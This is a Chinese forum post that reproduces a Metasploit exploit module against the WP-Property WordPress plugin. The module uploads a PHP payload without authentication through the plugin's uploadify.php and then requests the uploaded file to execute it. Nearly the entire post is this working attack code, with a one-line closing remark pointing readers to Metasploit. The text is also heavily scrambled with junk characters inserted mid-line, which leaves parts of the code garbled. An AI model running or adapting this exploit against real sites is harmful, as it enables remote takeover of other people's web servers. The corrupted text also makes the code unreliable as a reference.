WordPress WP-Property PHP 文件上传漏洞
" x9 T8 n& p% h# v2 J6 B
# w1 Y& C6 l- j$ c2 m3 Q, M) B ## # This file is part of the Metasploit Framework and may be subject to2 b& c) [. I; x) I+ s- Y3 N
; N y) y9 M$ M g/ \# redistribution and commercial restrictions. Please see the Metasploit
; c c1 `. }) z, ]! Z/ }' v
1 n- A. t: K9 g( d5 n# Framework web site for more information on licensing and terms of use.
, k( L* C, U. U( J% ^
) @* l6 y$ r; E' r# http://metasploit.com/framework/ ##, r" w/ r; Z5 F, V5 W; t
+ y! d* |2 _" @9 M8 j1 \
* n9 @; n6 {* M3 n! L" K1 T/ D* W4 B
* T, O* d) a( q- E; {* H3 J
: \; T; Q: T. b
require 'msf/core'
/ X4 Y$ B) O# ^* m% H" [4 grequire 'msf/core/exploit/php_exe'9 C8 ~3 U. Y3 T
* } U. {/ E* p9 sclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',: a6 N j* |6 g0 ^ N
'Description' => %q{/ ?. l# }2 H: J) G% [3 ~ }
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
0 Z- U: Y ^# j2 i[' V) p( ~0 n, J' r! p' E6 _5 B" o% B
'Sammy FORGIT', # initial discovery) h% X: O, O! g7 z- R/ T
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
" m1 l, i- B; s6 a k3 G- F],
& e- r& C8 w6 G' i6 H* f'License' => MSF_LICENSE,- _ ^9 |$ P/ @" @, Z6 i
'References' =>6 t( P4 M6 s w' f
[0 F: |+ n- H8 [& L
[ 'OSVDB', '82656' ], z, N/ N6 a' q: a
[ 'BID', '53787' ],8 }" Z2 O8 n4 m/ e5 C" V6 O( ~
[ 'EDB', '18987'],/ \% g: U/ @! {
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
2 B+ ], Q; W. a* e* o) c],
( `6 V0 P# }! Z6 o( W Z'Payload' =>+ z$ r1 J O+ d/ c( Q
{$ B; M' y& I: A( F9 ?4 z: `5 z
'BadChars' => "\x00",
: G1 c9 R3 V9 [" @! L},
$ `' q: c3 `. ~5 G'Platform' => 'php',% C" D7 ?+ p1 T! |) l) i
'Arch' => ARCH_PHP,
& S0 v8 [2 d3 m4 |! ?1 q8 P6 D% s'Targets' =>- U6 L2 X! f% O) j7 w4 a5 l
[* o% |& ~/ f" B. k1 G9 |
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],) B5 t) N. {, L
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 \- x* `/ v _
],
2 ~8 r3 z% T) t# O( E( ]'DefaultTarget' => 0,
2 D) L$ K8 p' b8 m' j'DisclosureDate' => 'Mar 26 2012'))
4 }; X5 Y/ p A' z, z( ^
9 t& |7 M/ _, ~0 L5 R! B6 yregister_options(
9 F) b/ M* [3 T' @8 x* Q[
, M$ T2 i1 ]* D$ u7 `, iOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
: e) w& M* K s: r], self.class)
$ S: k2 N0 ^$ d& z) P: x7 xend
( {8 L! i2 x) \9 Z3 ], U& @& p, U; ~8 j/ x) J" n' w
def check
7 M Q$ Z$ _ b l. Wuri = target_uri.path
1 E/ O( ]7 c- q! [; G+ Y# `4 `uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
" M" C! A% I5 k. n'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
* m. t% Z$ p3 V, l})
9 Q* f, {0 e# g& @/ X! V m( a8 \6 H n: A- q. V* W$ H/ b1 c
if not res or res.code != 200
$ U- S* @# d$ Y3 lreturn Exploit::CheckCode::Unknown; ?% C) b: B: N. u! |$ F% D1 U
end
) S$ q% R# y! Q h) T& ^6 W$ M* k2 D- W. r v+ F& ]& J
return Exploit::CheckCode::Appears
$ b, g3 a8 S% [- x5 c4 d- @end' C3 {2 v7 e3 \
: s8 B9 U1 E" \2 ]3 gdef exploit' m/ e. m! A9 g1 @8 L1 X
uri = target_uri.path
9 Y3 m% C- q5 \; E ~+ Guri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true): e( M @5 H$ K# B. c3 u
- l3 s% D. C. p+ |* T+ |0 m3 w( Adata = Rex::MIME::Message.new
* D9 d X+ D% L# k6 A0 c" Qdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")9 }1 Z! m. d4 N# y: Z+ @
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
' W1 k+ i! b! [0 qpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')" u' n' f1 a F" s4 a- V; }
. T7 x# S3 f" D4 c+ _% `2 F
print_status("#{peer} - Uploading payload #{@payload_name}")
8 p5 \/ ]* e; G- o& Yres = send_request_cgi({
9 ]# }; O ~* e1 _'method' => 'POST',$ j7 ~. r v9 U, g# ~
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",# ` l- v% e: y9 X4 C) c$ u
'ctype' => "multipart/form-data; boundary=#{data.bound}",( n; ]5 E6 d+ j7 i5 {7 Y
'data' => post_data
3 n+ I0 ~0 }$ T4 n1 Q})( a4 x. {) ]6 K4 q; C
/ {0 o; P% b8 O" Aif not res or res.code != 200 or res.body !~ /#{@payload_name}/% R) t" f; P9 [
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
0 g$ f; W! P0 pend
+ F, J6 \0 d. \8 S( J: r3 @
% T6 v) `" g; u( hupload_uri = res.body! Z3 i4 o' ^- G1 M6 _, T) b- m- Z% v" | ~
6 U$ y3 A% H& |( q& a: A6 S
print_status("#{peer} - Executing payload #{@payload_name}")
1 ^, P" M4 X) G. x8 l) X9 Wres = send_request_raw({7 D3 T/ \) q/ c. J2 T
'uri' => upload_uri,% O& n1 [2 x; ]. a1 x* W
'method' => 'GET'# M& e+ |$ ]! z0 r$ m( s
})5 o% V5 C0 J2 W4 X& q, s
end
' m. D! |% d3 m7 w b0 Qend$ F% A% p+ a% s9 y1 \! n( F1 d$ ?. x
2 X* s/ t9 z- C# T不要问我这写的是什么 怎么利用 我是说msf./ I, Y, h A1 |; t" {% w
( n5 m: ]8 ?% T- B0 d |